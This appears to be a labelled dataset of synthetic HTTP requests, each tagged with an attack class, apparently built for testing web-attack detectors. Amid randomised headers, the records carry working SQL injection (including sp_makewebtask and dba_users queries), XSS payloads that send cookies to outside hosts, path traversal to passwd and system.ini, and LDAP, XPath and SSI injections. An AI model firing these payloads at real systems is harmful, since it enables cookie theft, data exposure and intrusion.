Warning: 924 www.tl2tn2r.tiff:1735 "i0edcChnth5mercmaxie" "Sat, 07 Feb 09 03:06:52 CET"

null

End - Id: 41554
Start - Id: 42190
class: SqlInjection
GET /3QN5/O1/2cvmthoisy/aCfBz/mcetfizt/xh/execX4u5P1kH-w5CI@/bMJcTS2b3N/rgnsgk/enaxRe3rrnnaYytail6.htm?norCddaagylebq0=iibhaly&ESsuhp3etfilh2=chairs%27+++++UNION+++SELECT++++khtt+++++FROM+++dba_users++++WHERE+++++name+++like++%27%2525&ttrnaonnviiT=%3Blike&ot9lradHnui=nemcmddivq&tthayouu0oi8=oiet&TowuroisxEa=%3Ca%29e&tlosnajn=-tat%5D&8mCr=8aNeipuetcnh9hiT&ant=aQ2icw6zSmj&GkK.i=axterms HTTP/1.0
Host: www.Phoo.cz
Connection: i2Lvn
Accept: text/*, text/*, audio/x-wav
Accept-Charset: cp-950, x-mac-arabic;q=0.8, cp-950;q=0.6, windows-1253, windows-1250;q=0.0
Accept-Encoding: gzip
Accept-Language: tno-nxotI, n0amod-ihn4, u560diee-yaihc, fE-uee, emij-peaenIfz
Cache-Control: only-if-cached
Client-ip: 139.46.56.112
Cookie: phEehlerranoai=oEenkpdee;iteO=nhd3O;dtmeotl=inedCmfrnnhopenT;urD=498764
Cookie2: $Version="31"
Date: Fri, 17 Jul 09 02:56:01 GMT
ETag: "vzVnq5..5A_KnH1Cfr"
Expect: irpp0=cI1o9hea;esvtet
From: geah@hsnseiely.org
If-Modified-Since: Tue, 07 Nov 06 10:40:06 GMT
If-Unmodified-Since: Mon, 21 Jan 08 09:22:38 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 08 Jan 10 09:31:19 UTC
Max-Forwards: 32
MIME-Version: 4.5
Pragma: aaP1='8trhO'
Proxy-Authorization: rynRof iahsblar=Etalhl
Authorization: NTLM NmVhc2VFdW45Y09sdHJ0a25lb3Rla3llYWJyNWFvb2VvWWJzbQ==
Range: 75-,-69,-978379
Referer: http://y1teese.de/as6ssenr/ot2thn/g8nu/T5ere/78xcsm.jpg
TE: gzip;q=0.6,gzip
Trailer: Transfer-Encoding
User-Agent: eIeut/0.6
UA-CPU: StrongARM
UA-Disp: 466,6159,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x5537
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: o7cUT
Upgrade: ji40ad/7.5, ednwes/8.3, osi/1.7, eor/7.9
Warning: 601 194.137.96.43 "gotieoa7eticdpyar6l2" "Thu, 01 Mar 07 08:53:20 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 15953082
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42190
Start - Id: 47028
class: XSS
GET /heoiTgpn/va6t/sj/ELhP10oyLxVbinu0aF/lcszhknjssgielthod/rwasgantwltlNas2/rV92NR-FdCp.jpeg?5aitegLsy=esetgodaAiai6e&KbGWBEoqwLVP=rcyndiv&ua6sloeeeluy=Psr9&nM=arre&ahd8eseu=el%24h&eq7Ie3afzO=lxvxHsTHlT&ioLe=psS_T3&5eqw=%3C%21%5BCDATA%5B%3C%21--%5D%5D%3E%3Cscript++++%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.or.com%2Fcgi-bin%2Ftranan.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript+++%3E&neoangas=%27caij&m9nqsprnivdexoi=eCG9v8 HTTP/1.1
Host: www.toi7crr.biz
Connection: keep-alive
Accept: image/jpeg, image/*;q=0.7
Accept-Charset: utf-7, windows-1251
Accept-Encoding: identity;q=0.6, gzip;q=0.5, compress
Accept-Language: oe-pa;q=0.8, btah-heDezir;q=0.3, h-rm, 5-o;q=0.4, lee-eny8c6md;q=0.5
Cache-Control: no-transform
Client-ip: 170.28.161.6
Cookie: agtlevklkf=a3;bsbuFah7hoett=e5PLl@owch9
Cookie2: $Version="7"
Date: Mon, 25 Jan 10 07:39:51 UTC
ETag: "gHWmyyEWa2M7g1jeAj39"
Expect: ntdeN6d
From: Desiah@eghc.be
If-Modified-Since: Tue, 03 Feb 04 02:18:57 GMT
If-Unmodified-Since: Sun, 26 Jun 05 03:51:02 GMT
If-Match: "8e@KYxU.5mADLniHn1u"
If-None-Match: "CZpaCf5RW7L.av6emYQv"
If-Range: "szarhDVDUDo.5StC6mV"
Max-Forwards: 8
MIME-Version: 5.6
Pragma: euu1eOi='massSe'
Proxy-Authorization: u02e nsohtc=unmnd1b
Authorization: NTLM b3FraWlxdWxhc2VFdGVodDl0Y1RsYXZibmJlcG9sajV3ZXNvYnRoYXRkZmk=
Range: 1054-5
Referer: /lsnaia.gif
TE: trailers,chunked,deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.6 (Windows; U; Win98 2.7; nS-m8; rv:7.7.2) Gecko/81038645
UA-CPU: MIPS
UA-Disp: 5519,887,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: FTP/4.9 45.69.40.78, 9bet/6.7 www.hwd3s6.htm, 6.8 www.eLirlO.html
Transfer-Encoding: deflate
Upgrade: tlmcr/4.0, ihaNi/9.2, ezosme/6.2
Warning: 814 www.sz2gl.html "et0hhawps" "Sun, 03 Feb 08 08:33:56 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 40030380327368685
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47028
Start - Id: 48573
class: XPathInjection
PUT /rQfBO/ghirmowolact3L/tPDt@K7V9@PY/cUPZg05ah7q6xC/cZJJQC6hjDW70I/orGtsee0/d9U/n1.jpeg? HTTP/1.1
Content-Length: 332
Content-Language: njfn5eir
Content-Encoding: deflate
Content-Location: http://t8baAn.fr/92ivre/yD11Enar/heon/lszfu3.msf
Content-MD5: dWJ0RW5DaGxudGNkZHRpZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 02 May 08 04:41:31 CET
Last-Modified: Sun, 11 May 08 21:32:25 CET
Host: www.rdre1TEppt.de:7
Connection: close
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: mh9cotQT-3sAreiom, e-wueto;q=0.0
Cache-Control: no-cache
Client-ip: 5.57.77.191
Cookie: Snnq0sqhai5yne=i0RX;sm6Mrsoqyooe4=d@K_;o4ohcp=\? tf;ceoehoUhs6e=t$ai%mrnmburxuh ioD;Tasfrzx=jbeasts4jr:9
Cookie2: $Version="47"
Date: Sat, 27 Jan 07 04:40:32 CET
ETag: "GSCXoNh2vkhzld6.WL"
Expect: oaln=atraiu;nomtiAaz=iaeh
From: tatnungw@cltshcrl.be
If-Modified-Since: Thu, 19 Nov 09 06:23:42 GMT
If-Unmodified-Since: Sat, 21 Jul 07 05:23:20 UTC
If-Match: "GMT7lEHR15R_l886"
If-None-Match: *
If-Range: Sat, 15 Jan 05 04:29:18 GMT
Max-Forwards: 260
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic NGFpOXJ1OGw6cnR0aHRncg==
Authorization: Digest qop=auth-int
Range: 9027-,6479-,26031-
Referer: http://tun8ntyO.st/ea7mYaz/khmd/nyafilm.asmx
TE: trailers,gzip
Trailer: Date
User-Agent: Mozilla/4.4 (Machintosh; U; Mac OS X 8.8; Fe-op; rv:9.2.7) Gecko/85626309
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 316x0903
Via: HTTP/4.0 www.iynhoepn.jpg, FTP/1.9 www.Tomtrjy.gif, HTTP/2.7 53.239.190.128:3965
Transfer-Encoding: gzip
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 024 102.167.137.67 "nvpacNsesceoTbreyoUd" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

tj=$nodehome6awZadoodeleteoh&gp2=689&rpdi7ltarsrkduX=965963251&r9iko7s=e&tlpoeu2odiraoi=myME8LLi_yY&rRcXT@mocha6.5HB=os/ds95f/hha/child::node()[    position()=75]     |  mauEn/n/utnao/child::text()[position()=273]   or 'te'    = '&g7dmsoRej0ne=vara<EelibsUeug oam&am=sdr

End - Id: 48573
Start - Id: 46253
class: PathTransversal
GET /oOreheu8xsn/mvro5p8pisnbrnroLqap/bgsoundZ/elpy4eottb/20Aarxoun6uN/1godpnoO/JWcmd/trsY2h-K0G0Y8ob.6/qWL/otOyatEmos9nmIc5.pl?XGfromdeleteWCSIm.=nfwhere%7Cyi&tRsrletr=5&JoTENhE_Bqq=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&guI=Aecnitmlxiif3tsi&AWzk6=obsT9ucehfi&m4tAr0dposition=ets9qr%28&sfnc0e4tlk5=ivP-32i&eueha4=nrtK7RxO2_1g HTTP/1.0
Host: 39.21.172.136
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: tpo-wnpxc;q=0.1, xwGenw-Be4la, fepi-RTkcg, oltona-b, ezt-toj;q=0.2
Cache-Control: max-age=7
Client-ip: 190.79.101.95
Cookie: roe4=7<
Cookie2: $Version="04"
Date: Fri, 06 Oct 06 17:02:20 GMT
ETag: "_9L1EBmUlyekels"
Expect: 100-continue
From: iervv@usohuics.gov
If-Modified-Since: Thu, 30 Sep 04 05:04:10 UTC
If-Unmodified-Since: Fri, 23 Dec 05 14:47:22 GMT
If-Match: "@C7Ql61RgNbAeoD"
If-None-Match: *
If-Range: Sun, 22 Jul 07 03:13:40 GMT
Max-Forwards: 488
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://a8bl.ch/noetzkll/itbnanre/awsc.jsp
Authorization: NTLM TmhsYmlyYWN5aWNvZWQ4U2tld3A0aHU1b3JlaHZudGMyM3Rlc0dkaQ==
Range: 5263-
Referer: http://www.hneot.biz/seSvphe/dkrdtbvt.bin
TE: trailers,chunked;q=0.2
Trailer: If-Modified-Since
User-Agent: Mozilla/2.0 (Windows; U; WinNT 9.3; yd-ns; rv:2.1.3) Gecko/84771466
UA-CPU: 68000
UA-Disp: 5467,9007,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: crh/0.1 www.Ieysnc.shtml, FTP/1.3 104.178.50.100:477, HTTP/8.2 47.145.216.109
Transfer-Encoding: emtc; saTe=ao9r15
Upgrade: roeie/1.4
Warning: 961 59.212.87.203:1 "2ryq" "Mon, 19 Mar 07 07:17:54 UTC"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 52344762655816
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46253
Start - Id: 36995
class: LdapInjection
GET /y5zfL2Ba_KUC7LMJBB/tydk0aonnigrerthnas/es9yzdea3nge/h-MW/11aQG5g0bDJk/t8C5U/sa2eT2/e7oateoclmR/hToxed16GNrKB2LrGrn/EetAllicneetwshLt/ekagleene.shtml?ZOVaCB=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: www.LenDh.st
Connection: keep-alive
Accept: video/mpeg, application/*;q=0.6, text/plain
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=530
Client-ip: 9.220.179.73
Cookie: eviYuylr5=054236;omiiee9dvn=sCxe
Cookie2: $Version="893"
Date: Tue, 12 May 09 11:46:44 CET
ETag: "B8E.sqhQTxd1WRrRZqJv"
Expect: 100-continue
From: nlnE@rejed1gea.uk
If-Modified-Since: Mon, 20 Mar 06 18:38:33 GMT
If-Unmodified-Since: Sat, 16 Apr 05 19:27:18 GMT
If-Match: *
If-None-Match: "ZKH_-y9Yd-._F82"
If-Range: Sat, 15 Nov 08 05:56:45 UTC
Max-Forwards: 12
MIME-Version: 5.8
Pragma: 94o8dm='fn'
Proxy-Authorization: Basic YXRwaTowSWV5OGxj
Authorization: kRnrwd aue9huup=eencnnai
Range: 84-,-422477,1197-5319
Referer: /zo9mm0e/yDtls/zypa0/eAegh/fzbdG.css
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/8.4 (X11; U; Linux i586 6.6; oe-tz; rv:8.3.3) Gecko/77070948
UA-CPU: MIPS
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 391x727
Via: loi/9.3 135.61.31.29, 3.4 www.cSreauo3.png, 8.1 www.eehoDnoi.tiff
Transfer-Encoding: deflate
Upgrade: Rtes2e/0.8, Uappi/6.8, oe526/7.2, eoop6g/8.7
Warning: 135 249.137.139.161 "EeTeptifzxaoiar" "Fri, 26 Jun 09 16:27:58 UTC"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 4092233930
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36995
Start - Id: 46503
class: XSS
GET /<script>alert('Vulnerable')</script>.jsp? HTTP/1.1
Host: 219.137.247.81
Connection: keep-alive
Accept: audio/basic;q=0.8, text/html
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: mr8ewix-twlwhh, hWeeTa-4teqh;q=0.8, eemieour-5a;q=0.9
Cache-Control: eohn1=y
Client-ip: 200.157.87.196
Cookie: txse=mwisoeEasoets;ymcteevtn=rdit0)ajevaltteiRT8tio;uioeq9raRsieh=2162157
Cookie2: $Version="042"
Date: Thu, 12 Feb 09 21:28:29 CET
ETag: W/"CdcL9D22QKTslk5h3r"
Expect: otetPscl
From: piteR@trksge.gov
If-Modified-Since: Thu, 26 Oct 06 04:35:25 GMT
If-Unmodified-Since: Mon, 12 May 08 13:07:37 CET
If-Match: "-1jN9dtO3SF3qg4Te"
If-None-Match: *
If-Range: "-j9OI@AIkxXhBo86PRq"
Max-Forwards: 2521
MIME-Version: 0.6
Pragma: psifynim='lzdt8o'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic ZXNjdm5wOjZzUmlp
Range: 8-112855,2026-165541
Referer: http://www.teh5xe.com/bRnfm/7the7e1o/oeezoen/sonnOwo/g7nil.tiff
TE: trailers,trailers
Trailer: Date
User-Agent: trr9oaasebwmwaeeua9
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 139x000
Via: 7.4 35.254.42.55:38056
Transfer-Encoding: identity
Upgrade: lNa/8.0, nnchdy/2.1, q9de/3.4, se9N7o/1.4
Warning: 834 www.Zmliw.gif "s7aFxS3" "Wed, 07 Dec 05 08:00:39 CET"
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46503
Start - Id: 46470
class: XSS
GET /<script>alert('Vulnerable')</script>.jsp? HTTP/1.1
Host: www.4iapasqz.biz:80
Connection: keep-alive
Accept: video/quicktime, application/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 212.173.22.144
Cookie2: $Version="2"
Date: Fri, 21 Mar 08 23:19:08 UTC
ETag: "TClpSRyVRpjXpah"
From: oeed@ro5sY.uk
If-Modified-Since: Wed, 07 Apr 10 16:36:08 UTC
If-Unmodified-Since: Mon, 14 Jul 08 21:50:10 CET
If-Match: *
If-None-Match: "KelgZwzD12KEShLkLB5"
Max-Forwards: 75
Pragma: yr7s=lslO
Proxy-Authorization: Digest cnonce="eAenecin"
Authorization: NTLM b3BpbWN0dDR0dW5pQ0kxaGllbmV0VW9vdGE4c1VubW4w
Range: -540
Referer: /tark6.gif
TE: trailers,gzip
User-Agent: Mozilla/9.1 (Machintosh; U; PPC 9.6; lr-wh; rv:3.2.9) Gecko/32502623
UA-Pixels: 920x981
Transfer-Encoding: deflate

null

End - Id: 46470
Start - Id: 46440
class: PathTransversal
PUT /boot.inimochaLz9KnullMwindow.openj4/ceecxe/ooesnstrocaasmi/Pb/tpmqUioergtH9ht/eien5df/tJIlknCyxHE_jC/stfEsHmP0Sa5UIFDA/tRqV@xxKL/rNgrkK2jL24wA7/4dnttuhsvnoninanieh.nsf? HTTP/1.1
Content-Length: 23
Content-Language: TeeruX,veeobwO
Content-Encoding: deflate
Content-Location: /slio4t.php
Content-MD5: RXRlbXNzdGhxaGVkd0V1dA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 May 04 20:18:25 UTC
Last-Modified: Thu, 11 Jan 07 03:44:31 GMT
Host: 105.148.117.239:013
Connection: close
Accept: */*;q=0.7
Accept-Charset: euc-jp;q=0.1, iso-8859-3, iso-8859-8-i;q=0.1, x-mac-roman;q=0.8
Accept-Encoding: *
Accept-Language: \.\.\/\.\.\/etc\/passwd
Cache-Control: max-age=5343
Cookie2: $Version="643"
Date: Sat, 28 Jan 06 24:57:22 CET
Expect: te9bzU=vamasrr;Ndrl2s=amtw1ee
If-Modified-Since: Fri, 26 Nov 04 05:22:24 UTC
If-Match: *
If-None-Match: "tMEJkVSg2OrljzrS9s"
If-Range: Sat, 14 Nov 09 07:27:13 CET
Max-Forwards: 6
Proxy-Authorization: NTLM ZWkyemh1bHB6d2kwZnJhY3NldHdvYXNlZDdpaEFlc2FpcjRwVG9Bb3RnbmVvZmU=
Authorization: edst ntDr0=tnuswr
Referer: http://8a1faep.ch/oro4na1y/nhFe1E0/trnt.php4
TE: gzip,deflate
Trailer: Accept-Encoding
User-Agent: ftieami
UA-CPU: MIPS
UA-Color: color32
Via: e9aer/6.6 167.82.43.160
Transfer-Encoding: tgrhi
----: ----------------------------------------

ykZAcservicesgs=7011351

End - Id: 46440
Start - Id: 42403
class: SqlInjection
GET /checetoarOspz/eT.FpXe9sJMUnK-RhTV/aK1d4tI9k83mL7HG.exe?rhe9seaotn1=ioWLkBykw0&ndyaGkg6fbtd5ei=826911632&p6a=niiaGnydaiO&D638BIgroup byOa_TT=82206&ent0th=80&2TReFW=kIe&smeisedGgisoQc=cL_XG-wM5%40Bj&tgqnsaEysesehe=%25u2srA8&Eri9ee4=53728183&s1owqaeokafi=9056965&ennmshetztkh=%27+++OR++%27oleu9rb%27++BETWEEN+++++%27R%27+AND++%27T HTTP/1.0
Host: www.aaHawOdStr.gov
Connection: close
Accept: application/*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: oN-isrhsle, cu-sfse3
Cache-Control: max-age=29390
Client-ip: 175.53.83.245
Cookie: G1eechoSTGN=qinserth06otereohincludeel;oresata1coa5s=29;LswBfopen=ecnNeewalhteei6;u6=250653;Fii=528904
Cookie2: $Version="12"
Date: Mon, 14 Mar 05 06:52:26 UTC
ETag: "Ih__Fx4k.oUhLqaWav7"
Expect: fbs8xY
From: 1tXiees@Csgv.st
If-Modified-Since: Sun, 18 Mar 07 10:37:17 GMT
If-Unmodified-Since: Sat, 15 Aug 09 06:47:05 GMT
If-Match: *
If-None-Match: "s8MqG@JQ9iKzuWDb4I2"
If-Range: *
Max-Forwards: 095
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: JslOti auhh=xthke
Authorization: Digest nc=fdBBaf51
Range: -4,92807-997,-01613
Referer: /anoFta/mgt9/rmhjsasX/ewrdudms.sh
TE: chunked;q=0.7
Trailer: Host
User-Agent: Mozilla/8.8 (compatible; eeyaie; Win98; omtsuim2)
UA-CPU: StrongARM
UA-Disp: 156,101,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 189x646
Via: 0.4 www.wnylltk.htm
Transfer-Encoding: gzip
Upgrade: 2ac/9.1, rwme/4.7
Warning: 593 www.ibdmueus.shtml "Egye9eoeioV6AwrcnL" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 67876
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42403
Start - Id: 36081
class: PathTransversal
GET /Ai/sizsqeDttes5nuim5swa/nN5TLdF/seDH/i.X_/rc/eOO664he0rJJ4O9d/3s4tlrabnnl/ur0VztRgseaem2lrmk/o@ks78A/ai6oy9xn/0GqRCZ.png?12oBia5wmRoi=7674&a-Dqytb6VdF=w4Y&de1ob3nw=6365240&td2iytrjr0zr=%27s&9idhoI=%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: www.VdDammnie.fr
Connection: close
Accept: */*
Accept-Charset: us-ascii, iso-8859-9;q=0.9, windows-874
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 189.28.10.96
Cookie: wlv4haqs=9iaires8r6a;CZ.-adxP8htpassPZ=8405501;htosee6lTIfs=2ol42;hke3a=0ssh
Cookie2: $Version="080"
Date: Tue, 25 Dec 07 13:02:57 UTC
ETag: ".pe2aGJrRMzZbqnQAMiF"
Expect: 100-continue
From: Esva@5c4oorIai.it
If-Modified-Since: Tue, 04 Sep 07 06:36:54 GMT
If-Unmodified-Since: Fri, 23 Nov 07 08:04:32 UTC
If-Match: *
If-None-Match: "2Bu-xL3QD33X6BRyUOnP"
If-Range: *
Max-Forwards: 2
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM cm1id2VuZ3R0ZG5yaG9jbmVqOHNpc3JxczVsaWlveHdzR25hb0xuZHA=
Authorization: diW0 aiue8nd=tsaL
Range: 67-310757
Referer: /7ecp/tSao/meprsh/wczil/sbuh.jpeg
TE: chunked;q=0.9,trailers,trailers
Trailer: Host
User-Agent: 94tgnbMt (l.qrARykTk; igi5kRD8C)
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 039x0543
Via: 6.2 www.cdOb.tiff
Transfer-Encoding: identity
Upgrade: sztad/3.9, y9oto/3.0
Warning: 246 www.eofho2eh.shtml "ewcmspiaijfstirndeh6" "Fri, 05 May 06 17:12:43 GMT"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36081
Start - Id: 35029
class: SqlInjection
PUT /OOnu%uqHm3ET./cKntxR6OxLIMVmNkcD/cDZ8KFBvWgIEA5uURee/laNtntdcueucdb/h4oxcA_CnjjeXs/estouCks9t8eysgzdOf/tswiorEpyo.sh? HTTP/1.0
Content-Length: 343
Content-Language: enntt5de
Content-Encoding: identity
Content-MD5: ZW90aHZkMWVyaWlvdHlFaA==
Content-Type: application/x-www-form-urlencoded
Host: 30.112.38.75
Connection: keep-alive
Accept: */*
Accept-Encoding: 
Accept-Language: *;q=0.0
Date: Sat, 27 May 06 04:08:02 UTC
If-Unmodified-Since: Sat, 01 Aug 09 20:51:16 UTC
If-Match: "KeKiOFuQxypt3TlTaAB"
If-Range: Tue, 01 Jan 08 17:23:49 UTC
Max-Forwards: 78
MIME-Version: 1.0
Proxy-Authorization: Basic bWR0cmxSeTpydUN0ZXRlcg==
Authorization: Basic dXJkb3M6T3NqZA==
Referer: /iiedo/saneP.asmx
User-Agent: d.BB6@cDct http://www.aitaRl.it
----: --------------------

xdT3mqtoo=rk2&tericeLn=5'dxZdhavingeoS&e3hsdetEshnjea=oVwqDloej&veOtbr2rot=ga)likeelansppscmd&hncuwolh=log4hdi&iowevjrlfr=';  EXEC master.dbo.sp_makewebtask   'c:\inetpub\wwwroot\saFunneh.shtml',    'SELECT  8i FROM  ew68    WHERE  xtype=''U'''&dEat=lassd&uekasnraX1i=tfcn&PREexec=tpOz5zb&aoadekaSh=96175065

End - Id: 35029
Start - Id: 38567
class: LdapInjection
GET /e_/t2sdHgpun/6984_hy.EGJ.png?ZwAROK5lC=aRdriblrMtebia&2hteMiaps=4903%29%28%26%28objectClass%3Diiu2%29%28%7C%28sn+%3DsaS%29%28cn%3Dtsh+++J*%29%29 HTTP/1.1
Host: 158.205.20.5
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 33.219.241.182
Cookie: souahretje=gciSNfUmfdeiidc
Cookie2: $Version="55"
Date: Sat, 02 Oct 04 20:56:19 GMT
ETag: "Xn6bLNl6HcqYn2A"
Expect: 100-continue
From: Mi7ssg@viIni5i6.de
If-Modified-Since: Tue, 01 Nov 05 07:38:10 GMT
If-Unmodified-Since: Thu, 17 Feb 05 13:10:06 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic bGVhY286c3RvcnNz
Authorization: NTLM dXFDeWhpc3RvbnNqbWVhaml6eTZkbGdzVGl0Y050ZmQyaHJvaXNoTm9vYQ==
Range: -5
Referer: http://dgtesn.gov/tdlthd.avi
TE: trailers,chunked
Trailer: Accept
User-Agent: Mozilla/7.5 (X11; U; Linux i386 8.8; un-oc; rv:0.1.3) Gecko/06112994
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6483x132
Via: FTP/8.9 117.115.247.103, HTTP/6.4 147.250.225.235
Transfer-Encoding: deflate
Upgrade: iintzo/8.2
Warning: 605 www.aElte.jpg "smttlahhNbrou8r" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38567
Start - Id: 39272
class: SSI
GET /f.4d6dc4_Q74.jsp?m8eiot=%3C%21--%23email+fromhost%3D%22www.etsfeits.com%22+tohost%3D%22mailbox.lne.com%22+message%3D%22szaTh+eyehfo+la+rhgtt5%22+fromaddress%3D%22fjeb.com%22+toaddress%3D%22ayv.hehehc.com%22+subject%3D%22sdu%22+sender%3D%22occ.com%22+replyto%3D%22qguotg.com%22+cc%3D%22a5%22+inreplyto%3D%22stmi1+srh+t%22+id%3D%22tel9mail%22+--%3E&seqv2mnp=peiet60fwl&whteuaHt72o=h%3AxatjgwerA8c HTTP/1.1
Host: www.1hotg9.st
Connection: keep-alive
Accept: application/x-tar, video/*;q=0.9, image/*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: deflate
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 37.187.22.142
Cookie: ol=8e
Cookie2: $Version="31"
Date: Sat, 25 Sep 04 16:49:18 CET
ETag: W/"dTX0RPI69X0Rz8hkyf"
Expect: tGnf1g=pja2z2le;grncwlo=gs7s
From: erhT@noAtt.uk
If-Modified-Since: Sun, 23 Dec 07 14:29:02 GMT
If-Unmodified-Since: Mon, 21 Jan 08 23:41:01 GMT
If-Match: "j7zB6X1DipfkYnDGe"
If-None-Match: "RwjmJJj2ALUSTD7yxPQz"
If-Range: "yN36kgKImrjW6fC7"
Max-Forwards: 2698
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: NTLM c29NZW9pZGFjaHJzckNjZTZzZWFwcGlhcmVzdnVlanRzaWlwU293YW9hdQ==
Range: -219632,263179-06080,264504-7
Referer: /eerzt/rrtl.js
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/0.7 (X11; U; Open BSD i586 2.9; sn-oy; rv:7.9.4) Gecko/92081162
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8684x662
Via: t5ct/2.3 www.caoej.jpg, slc/5.3 www.2Epsn.jpg, iow/0.3 www.iShon.gif
Transfer-Encoding: compress
Upgrade: etsi/0.2, 42Nn/6.7
Warning: 014 58.200.111.202 "ltrIo" 
X-Forwarded-For: 34.130.240.220
X-Serial-Number: 04901
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39272
Start - Id: 47070
class: XSS
GET /snyeetieg0.asp?atw=srsgoicZ+odo&joeabco=leeiuetWlobject&iqoae=bu&af=rtc+xqannph-ev5o&ucyiKo=%3Cdiv+++onmouseover+++%3D+++%22+++%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.chdees.com%2Fcgi-bin%2Fretr.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22%3E HTTP/1.1
Host: 157.63.111.33
Connection: l8qi6aOT
Accept: text/*;q=0.0, application/rtf;q=0.7, audio/basic;q=0.9
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 217.116.65.138
Cookie: ec=62009654;Fs_96u5_6p=08connectqtt: servicesncHeeisoiformt;ahsed1cnnts=vgn0ezteeeahgois/betweenh;DLd2HK=ncneba;ivEmznJmi=629886
Cookie2: $Version="60"
Date: Sat, 06 Sep 08 17:14:59 UTC
ETag: W/"sdelRvzyys61VAh"
Expect: yshaae=hl6e2eC
From: l5ga@0acwrnnsyp.biz
If-Modified-Since: Tue, 01 Dec 09 15:19:46 CET
If-Unmodified-Since: Tue, 12 Feb 08 14:22:48 CET
If-Match: "s3IjE_BSN5P4UBme"
If-None-Match: *
If-Range: *
Max-Forwards: 08
MIME-Version: 6.8
Pragma: bcn4=slgbd
Proxy-Authorization: NTLM dGJ0b2VjdDBhdG1zb3V5dGx1b2V1aWJzc0s2MXpobmliYXRoZWVpbw==
Authorization: Digest cnonce="p0oa"
Range: 44535-
Referer: http://www.etlrqi.org/l2ott/ianrhB/TmEpH.mpg
